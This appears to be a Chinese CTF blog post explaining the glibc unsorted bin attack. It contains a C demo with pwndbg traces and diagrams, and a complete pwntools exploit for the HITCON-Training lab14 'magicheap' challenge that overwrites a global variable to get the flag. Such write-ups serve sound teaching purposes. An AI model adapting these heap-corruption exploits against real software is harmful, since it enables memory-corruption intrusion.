<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// gcc test.c -g -no-pie -o test</span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> &#123;<br><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> target_var = <span class="hljs-number">0</span>;<br>  <span class="hljs-built_in">fprintf</span>(<span class="hljs-built_in">stderr</span>,<span class="hljs-string">&quot;&amp;target_var and target_var:\n&quot;</span>);<br>  <span class="hljs-built_in">fprintf</span>(<span class="hljs-built_in">stderr</span>, <span class="hljs-string">&quot;%p: %ld\n\n&quot;</span>, &amp;target_var, target_var);<br><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> *p = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">400</span>);<br>  <span class="hljs-built_in">fprintf</span>(<span class="hljs-built_in">stderr</span>, <span class="hljs-string">&quot;The first chunk_addr at: %p\n&quot;</span>,p);<br><br>  <span class="hljs-built_in">malloc</span>(<span class="hljs-number">500</span>);<br><br>  <span class="hljs-built_in">free</span>(p);<br>  <span class="hljs-built_in">fprintf</span>(<span class="hljs-built_in">stderr</span>, <span class="hljs-string">&quot;The first chunk_fd is %p\n&quot;</span>,(<span class="hljs-type">void</span> *)p[<span class="hljs-number">1</span>]);<br><br>  p[<span class="hljs-number">1</span>] = (<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>)(&amp;target_var - <span class="hljs-number">2</span>);<br>  <span class="hljs-built_in">fprintf</span>(<span class="hljs-built_in">stderr</span>, <span class="hljs-string">&quot;Now,The first chunk_fd is %p\n\n&quot;</span>, (<span class="hljs-type">void</span> *)p[<span class="hljs-number">1</span>]);<br><br>  <span class="hljs-built_in">malloc</span>(<span class="hljs-number">400</span>);<br>  <span class="hljs-built_in">fprintf</span>(<span class="hljs-built_in">stderr</span>, <span class="hljs-string">&quot;target has been rewrite %p: %p\n&quot;</span>, &amp;target_var, (<span class="hljs-type">void</span> *)target_var);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>程序执行流程：</p>
<ol>
<li>首先定义了一个无符号long类型的变量target_var，并赋值为0</li>
<li>接下来打印出target_var所在地址及target_var中的内容</li>
<li>创建了一个size为0x1A0（400 + 16）大小的chunk，并将malloc指针赋给p指针，然后打印出p的地址。</li>
<li>创建了一个size为0x204（500 + 16）的chunk，在释放p指针指向的chunk_400后打印出chunk_400的fd的内容。</li>
<li>将chunk_400的fd位置修改成 <code>target_var_addr - 0x10</code> 的地址。然后重新申请size为0x1A0（400 + 16）大小的chunk。</li>
<li>最后打印出target_var地址及target_var中的内容。</li>
</ol>
<p>首先我们在第14行下断点，使程序走过 <code>unsigned long target_var = 0;</code> 和 <code>unsigned long *p = malloc(400);</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">b 14</span><br>Breakpoint 1 at 0x40072f: file test.c, line 14.<br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">r</span><br>Starting program: /home/ctf/CTF-Workspace/unsortedbin-attack/test<br>&amp;target_var and target_var:<br>0x7ffe4cb8d888: 0<br><br>The first chunk_addr at: 0x1e406010<br><br>......<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">x/4gx 0x7ffe4cb8d888</span><br>0x7ffe4cb8d888: 0x0000000000000000      0x000000001e406010<br>0x7ffe4cb8d898: 0x29b6e71153467800      0x00000000004007f0<br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">x/40gx 0x1e406010</span><br>0x1e406010:     0x0000000000000000      0x0000000000000000<br>0x1e406020:     0x0000000000000000      0x0000000000000000<br>0x1e406030:     0x0000000000000000      0x0000000000000000<br>0x1e406040:     0x0000000000000000      0x0000000000000000<br>0x1e406050:     0x0000000000000000      0x0000000000000000<br>0x1e406060:     0x0000000000000000      0x0000000000000000<br>0x1e406070:     0x0000000000000000      0x0000000000000000<br>0x1e406080:     0x0000000000000000      0x0000000000000000<br>0x1e406090:     0x0000000000000000      0x0000000000000000<br>0x1e4060a0:     0x0000000000000000      0x0000000000000000<br>0x1e4060b0:     0x0000000000000000      0x0000000000000000<br>0x1e4060c0:     0x0000000000000000      0x0000000000000000<br>0x1e4060d0:     0x0000000000000000      0x0000000000000000<br>0x1e4060e0:     0x0000000000000000      0x0000000000000000<br>0x1e4060f0:     0x0000000000000000      0x0000000000000000<br>0x1e406100:     0x0000000000000000      0x0000000000000000<br>0x1e406110:     0x0000000000000000      0x0000000000000000<br>0x1e406120:     0x0000000000000000      0x0000000000000000<br>0x1e406130:     0x0000000000000000      0x0000000000000000<br>0x1e406140:     0x0000000000000000      0x0000000000000000<br><span class="hljs-meta prompt_">pwndbg&gt;</span><br></code></pre></td></tr></table></figure>
<p>接下来b 19</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">b 19</span><br>Breakpoint 2 at 0x40076c: file test.c, line 19.<br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">c</span><br>Continuing.<br>The first chunk_fd is 0x7f94a8840b78<br><br>... <br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">x/60gx 0x1e406010</span><br>0x1e406010:     0x00007f94a8840b78 [fd]     0x00007f94a8840b78 [bk]<br>0x1e406020:     0x0000000000000000      0x0000000000000000<br></code></pre></td></tr></table></figure>
<p>首先创建的 <code>chunk_500</code> 是为了使 <code>chunk_400</code> 被释放后挂进 <code>Unsorted bin</code> 链表中：释放一个不属于 fastbin 的chunk，并且该 chunk 不与 top chunk 相邻，该 chunk 会被首先放到 Unsorted bin 中</p>
<p>可以观察到由于 <code>chunk_400</code> 是第一个被释放进 Unsorted bin 中的 chunk，所以 chunk_400 的 fd 指针和 bk 指针均指向 Unsorted bin addr（0x7f94a8840b78）</p>
<p>接下来我们将断点下在第22行，完成p[1] &#x3D; (unsigned long)(&amp;target_var - 2);</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">b 22</span><br>Breakpoint 3 at 0x4007a6: file test.c, line 22.<br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">c</span><br>Continuing.<br>Now,The first chunk_fd is 0x7ffe4cb8d878<br><br>...<br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">x/60gx 0x1e406010</span><br>0x1e406010:     0x00007f94a8840b78      0x00007ffe4cb8d878<br>0x1e406020:     0x0000000000000000      0x0000000000000000<br>0x1e406030:     0x0000000000000000      0x0000000000000000<br>0x1e406040:     0x0000000000000000      0x0000000000000000<br>0x1e406050:     0x0000000000000000      0x0000000000000000<br>0x1e406060:     0x0000000000000000      0x0000000000000000<br></code></pre></td></tr></table></figure>

<p><code>p[1] = (unsigned long)(&amp;target_var - 2);</code> 这段代码其实修改的是 chunk_400 的 bk 指针，使其指向了 <code>target_var_addr - 0x10</code> 这一处地址</p>
<blockquote>
<p>为什么减去的是0x10，因为target_var 是unsigned long类型的，&amp;target_var - 2就意味着要减去两个地址位宽（8 + 8）<br>为什么要减去0x10，这是因为想将target_var所在地址作为一个fake_chunk的malloc地址，即fake_chunk的fd位置，减0x10的位置就是fake_chunk的块指针，这样才符合Unsorted bin双向链表的规则</p>
</blockquote>
<p>接下来我们将断点下在第23行，完成 <code>malloc(400)</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">b 23</span><br>Breakpoint 4 at 0x4007b0: file test.c, line 23.<br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">unsortedbin</span><br>unsortedbin<br>all [corrupted]<br>FD: 0x1e406000 —▸ 0x7f94a8840b78 (main_arena+88) ◂— 0x1e406000<br>BK: 0x1e406000 —▸ 0x7ffe4cb8d878 —▸ 0x1e406010 ◂— 0x0<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">c</span><br><br>......<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">x/60gx 0x1e406010</span><br>0x1e406010:     0x00007f94a8840b78      0x00007ffe4cb8d878<br>0x1e406020:     0x0000000000000000      0x0000000000000000<br>0x1e406030:     0x0000000000000000      0x0000000000000000<br>0x1e406040:     0x0000000000000000      0x0000000000000000<br>0x1e406050:     0x0000000000000000      0x0000000000000000<br>0x1e406060:     0x0000000000000000      0x0000000000000000<br></code></pre></td></tr></table></figure>
<p>可以看到在重新申请一个malloc(400)后，chunk_400被重新启用了，与之伴随的就是fake_chunk的fd链接到Unsorted bin addr，也就是说taget_var变量中的值就变为了 <code>0x00007f94a8840b78</code> ，我们继续让程序执行完，我们看一下打印出来的结果：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">c</span><br>Continuing.<br>target has been rewrite 0x7ffe4cb8d888: 0x7f94a8840b78<br>[Inferior 1 (process 265) exited normally]<br><span class="hljs-meta prompt_">pwndbg&gt;</span><br></code></pre></td></tr></table></figure>
<p>可以看到target_var变量中的值已经变为 <code>0x7f94a8840b78</code> </p>
<p>以下几幅图重示上面的流程：<br><img src="/images/unsortedbin-attack/1.png" srcset="/img/loading.gif" lazyload></p>
<p>首先在没有任何chunk挂进Unsorted bin链表的时候，Unsorted bin的fd与bk指针均指向自身的chunk头（左图）。接下来，我们释放chunk_400，由于有chunk_500的原因，所以chunk_400会被挂进Unsorted bin中。那么chunk_400作为唯一一个被挂进Unsorted bin中的chunk，其fd与bk指针都会指向Unsorted bin的chunk头，Unsorted bin的fd和bk指针也会都指向chunk_400</p>
<p><img src="/images/unsortedbin-attack/2.png" srcset="/img/loading.gif" lazyload></p>
<p>在执行 <code>p[1] = (unsigned long)(&amp;target_var - 2)</code> 修改完chunk_400的bk指针后，bk链接的就是以 <code>target - 0x10</code> 为块头的fake_chunk了。这里需要注意的是，由于chunk_400现在还挂在Unsorted bin中，我们此时更改chunk_400的bk会导致corrupted</p>
<p><img src="/images/unsortedbin-attack/3.png" srcset="/img/loading.gif" lazyload><br>由于在上一个步骤中发生了corrupted，所以在重启chunk_400的时候，Unsorted bin的fd依然还会指向fake_chunk。但chunk_400已经被拿走了，此时fake_chunk就与Unsorted bin相邻了，所以fake_chunk作为Unsorted bin的后一个chunk，fake_chunk的fd指针（即target的值）就会执行Unsorted bin的块头。Unsorted bin的bk指针将会指向fake_chunk的块头</p>
<p>那么这样一来target中的值就从0变为了Unsorted bin的地址了</p>
<p>总结一个流程：</p>
<ol>
<li>victim &#x3D; unsorted_chunks(av)-&gt;bk&#x3D;p</li>
<li>bck &#x3D; victim-&gt;bk&#x3D;p-&gt;bk &#x3D; target addr-16</li>
<li>unsorted_chunks(av)-&gt;bk &#x3D; bck&#x3D;target addr-16</li>
<li>bck-&gt;fd &#x3D; *(target addr -16+16) &#x3D; unsorted_chunks(av);</li>
</ol>
<blockquote>
<p>如果有点懵的话也可以看看这张图：</p>
</blockquote>
<p><img src="/images/unsortedbin-attack/4.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="HITCON-Training-Lab14"><a href="#HITCON-Training-Lab14" class="headerlink" title="HITCON-Training Lab14"></a>HITCON-Training Lab14</h2><p><a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/user-mode/heap/unsorted_bin_attack/hitcontraining_lab14">download</a></p>
<h3 id="Checksec"><a href="#Checksec" class="headerlink" title="Checksec"></a>Checksec</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_"># </span><span class="language-bash">ctf @ 646be31c85ae <span class="hljs-keyword">in</span> ~/CTF-Workspace/unsortedbin-attack/hitcontraining-lab14 [5:24:44]</span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">checksec magicheap</span><br>[*] &#x27;/home/ctf/CTF-Workspace/unsortedbin-attack/hitcontraining-lab14/magicheap&#x27;<br>    Arch:       amd64-64-little<br>    RELRO:      Partial RELRO<br>    Stack:      Canary found<br>    NX:         NX enabled<br>    PIE:        No PIE (0x400000)<br>    Stripped:   No<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">ctf @ 646be31c85ae <span class="hljs-keyword">in</span> ~/CTF-Workspace/unsortedbin-attack/hitcontraining-lab14 [5:24:47]</span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">file magicheap</span><br>magicheap: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=7dbbc580bc50d383c3d8964b8fa0e56dbda3b5f1, not stripped<br></code></pre></td></tr></table></figure>

<h3 id="静态分析"><a href="#静态分析" class="headerlink" title="静态分析"></a>静态分析</h3><p>本处省略静态分析过程内容，过程指北<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41202237/article/details/112589899">hollk - 好好说话之Unsorted Bin Attack</a></p>
<p>通过前面检查保护及静态分析阶段，我们得到了两个关键点：</p>
<ul>
<li>如果全局变量magic（0x6020C0）的数值大于4869(0x1305)就会触发程序中的system(“cat flag”)</li>
<li>在edit_heap()函数中存在堆溢出</li>
</ul>
<p>由于拿flag的条件仅仅只是magic的数值，所以完全可以利用Unsorted Bin Attack这种攻击手法，将全局变量magic(0x6020C0)中的数值调整为一个较大的数值</p>
<h3 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h3><p>最核心的部分应该是这四行以及修改p的bk指针为目的地址target-0x10(64位是-0x10,32位-0x08)：</p>
<ol>
<li>victim &#x3D; unsorted_chunks(av)-&gt;bk&#x3D;p</li>
<li>bck &#x3D; victim-&gt;bk&#x3D;p-&gt;bk &#x3D; target addr-16</li>
<li>unsorted_chunks(av)-&gt;bk &#x3D; bck&#x3D;target addr-16</li>
<li>bck-&gt;fd &#x3D; *(target addr -16+16) &#x3D; unsorted_chunks(av);</li>
</ol>
<p>这样也就将*target 的值修改为了unsorted bin 链表的头结点的地址了，这个地址往往是非常大的一个正数。</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python3</span><br><span class="hljs-comment"># -*- coding: utf-8 -*-</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>r = process(<span class="hljs-string">&#x27;./magicheap&#x27;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">create_heap</span>(<span class="hljs-params">size, content</span>):<br>    r.recvuntil(<span class="hljs-string">b&quot;:&quot;</span>)<br>    r.sendline(<span class="hljs-string">b&quot;1&quot;</span>)<br>    r.recvuntil(<span class="hljs-string">b&quot;:&quot;</span>)<br>    r.sendline(<span class="hljs-built_in">str</span>(size).encode())<br>    r.recvuntil(<span class="hljs-string">b&quot;:&quot;</span>)<br>    r.sendline(content.encode() <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(content, <span class="hljs-built_in">str</span>) <span class="hljs-keyword">else</span> content)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">edit_heap</span>(<span class="hljs-params">idx, size, content</span>):<br>    r.recvuntil(<span class="hljs-string">b&quot;:&quot;</span>)<br>    r.sendline(<span class="hljs-string">b&quot;2&quot;</span>)<br>    r.recvuntil(<span class="hljs-string">b&quot;:&quot;</span>)<br>    r.sendline(<span class="hljs-built_in">str</span>(idx).encode())<br>    r.recvuntil(<span class="hljs-string">b&quot;:&quot;</span>)<br>    r.sendline(<span class="hljs-built_in">str</span>(size).encode())<br>    r.recvuntil(<span class="hljs-string">b&quot;:&quot;</span>)<br>    r.sendline(content.encode() <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(content, <span class="hljs-built_in">str</span>) <span class="hljs-keyword">else</span> content)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">del_heap</span>(<span class="hljs-params">idx</span>):<br>    r.recvuntil(<span class="hljs-string">b&quot;:&quot;</span>)<br>    r.sendline(<span class="hljs-string">b&quot;3&quot;</span>)<br>    r.recvuntil(<span class="hljs-string">b&quot;:&quot;</span>)<br>    r.sendline(<span class="hljs-built_in">str</span>(idx).encode())<br><br>create_heap(<span class="hljs-number">0x20</span>, <span class="hljs-string">b&quot;dada&quot;</span>)  <span class="hljs-comment"># 0</span><br>create_heap(<span class="hljs-number">0x80</span>, <span class="hljs-string">b&quot;dada&quot;</span>)  <span class="hljs-comment"># 1</span><br><span class="hljs-comment"># in order not to merge into top chunk</span><br>create_heap(<span class="hljs-number">0x20</span>, <span class="hljs-string">b&quot;dada&quot;</span>)  <span class="hljs-comment"># 2</span><br><br>del_heap(<span class="hljs-number">1</span>)<br><br>magic = <span class="hljs-number">0x6020c0</span><br>fd = <span class="hljs-number">0</span><br>bk = magic - <span class="hljs-number">0x10</span><br><br>edit_heap(<span class="hljs-number">0</span>, <span class="hljs-number">0x20</span> + <span class="hljs-number">0x20</span>, <span class="hljs-string">b&quot;a&quot;</span> * <span class="hljs-number">0x20</span> + p64(<span class="hljs-number">0</span>) + p64(<span class="hljs-number">0x91</span>) + p64(fd) + p64(bk))<br>create_heap(<span class="hljs-number">0x80</span>, <span class="hljs-string">b&quot;dada&quot;</span>)  <span class="hljs-comment"># trigger unsorted bin attack</span><br>r.recvuntil(<span class="hljs-string">b&quot;:&quot;</span>)<br>r.sendline(<span class="hljs-string">b&quot;4869&quot;</span>)<br>r.interactive()<br></code></pre></td></tr></table></figure>

<p>pwned!</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_"># </span><span class="language-bash">ctf @ 646be31c85ae <span class="hljs-keyword">in</span> ~/CTF-Workspace/unsortedbin-attack/hitcontraining-lab14 [5:44:05]</span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">python3 exp.py</span><br>[+] Starting local process &#x27;./magicheap&#x27;: pid 887<br>[*] Switching to interactive mode<br>SuccessFul<br>--------------------------------<br>       Magic Heap Creator<br>--------------------------------<br> 1. Create a Heap<br> 2. Edit a Heap<br> 3. Delete a Heap<br> 4. Exit<br>--------------------------------<br>Your choice :Congrt !<br>flag&#123;hack_for_fun!&#125;<br>--------------------------------<br>       Magic Heap Creator<br>--------------------------------<br> 1. Create a Heap<br> 2. Edit a Heap<br> 3. Delete a Heap<br> 4. Exit<br>--------------------------------<br>Your choice :$<br></code></pre></td></tr></table></figure>


<h2 id="References"><a href="#References" class="headerlink" title="References"></a>References</h2><ul>
<li><p>CTF Wiki</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/unsorted-bin-attack/#2016-0ctf-zerostorage-">Unsorted Bin Attack</a></li>
</ul>
</li>
<li><p>CSDN</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41202237/article/details/112589899">hollk - 好好说话之Unsorted Bin</a></li>
</ul>
</li>
<li><p><a target="_blank" rel="noopener" href="https://blog.wjhwjhn.com/posts/hitcon-training-lab14-unsorted-bin-attack-magicheap-zjctf-2019easyheap/">WJH’s Blog- HITCON Training Lab14 Unsorted Bin Attack Magicheap &amp; [ZJCTF 2019]EasyHeap</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="http://liul14n.top/2020/02/21/Unsorted-bin-attack-lab14-magic-heap/">LiuLian - [Unsorted bin attack] lab14 magic heap</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://github.com/bash-c/HITCON-Training-Writeup/blob/master/writeup.md">M4x@10.0.0.55 - HITCON-Training-Writeup</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/390398222">知乎 - 看雪 - Pwn堆利用学习——Unsortedbin Attack——HITCON_Training_lab14_magicheap</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://linkpwn.github.io/2025/07/18/unsorted-bin-attack/">网络幻影 - unsorted bin attack</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://hacktricks.wiki/zh/binary-exploitation/libc-heap/unsorted-bin-attack.html">HackTricks - Unsorted Bin Attack</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/6847">先知 - ama2in9 - 深入理解unsorted bin attack</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://wiki.mrskye.cn/Pwn/glibc-heap/unsorted_bin_attack/#hitcon-training-lab14-magic-heap">SkYe Wiki - Unsorted Bin Attack</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/xiaochange/p/18206762">cnblogs - 山西小嫦娥 - PWN系列-Unsorted Bin Attack</a></p>
</li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Pwn/" class="category-chain-item">Pwn</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Pwn/" class="print-no-link">#Pwn</a>
      
        <a href="/tags/Heap/" class="print-no-link">#Heap</a>
      
        <a href="/tags/Unsorted-Bin-Attack/" class="print-no-link">#Unsorted Bin Attack</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>花与堆之Unsorted Bin Attack</div>
      <div>https://rainie017.github.io/2026/04/06/unsortedbin-attack/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>花時雨</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年4月6日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/04/06/largebin-attack/" title="花与堆之Large Bin Attack">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">花与堆之Large Bin Attack</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/03/29/fastbin-attack/" title="花与堆之Fast Bin Attack">
                        <span class="hidden-mobile">花与堆之Fast Bin Attack</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
